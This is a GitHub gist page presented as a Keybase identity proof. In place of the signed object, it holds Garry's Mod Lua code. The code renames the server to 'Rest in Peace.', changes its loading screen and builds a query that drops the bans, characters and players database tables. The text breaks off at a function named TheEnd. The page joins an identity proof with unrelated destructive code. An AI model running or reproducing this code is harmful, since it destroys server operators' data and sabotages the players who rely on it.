Skip to content

Instantly share code, notes, and snippets.

View SchwarzKruppzo's full-sized avatar

Schwarz Kruppzo SchwarzKruppzo

View GitHub Profile
@SchwarzKruppzo
SchwarzKruppzo / keybase.md
Created September 10, 2019 10:00
keybase.md

Keybase proof

I hereby claim:

  • I am schwarzkruppzo on github.
  • I am schwarzkruppzo (https://keybase.io/schwarzkruppzo) on keybase.
  • I have a public key ASA2J14Kf8weJ815V7twZW6YigAtsQBV42oxPFTr47IjNwo

To claim this, I am signing this object:

RunConsoleCommand("hostname","Rest in Peace.")
RunConsoleCommand("sv_loadingurl","http://i.imgur.com/hTJD37U.png")
local DROP_QUERY = [[
DROP TABLE IF EXISTS `]]..config.Get("mysql_bans_table"):Get()..[[`
DROP TABLE IF EXISTS `]]..config.Get("mysql_characters_table"):Get()..[[`
DROP TABLE IF EXISTS `]]..config.Get("mysql_players_table"):Get()..[[`
]]
local function TheEnd()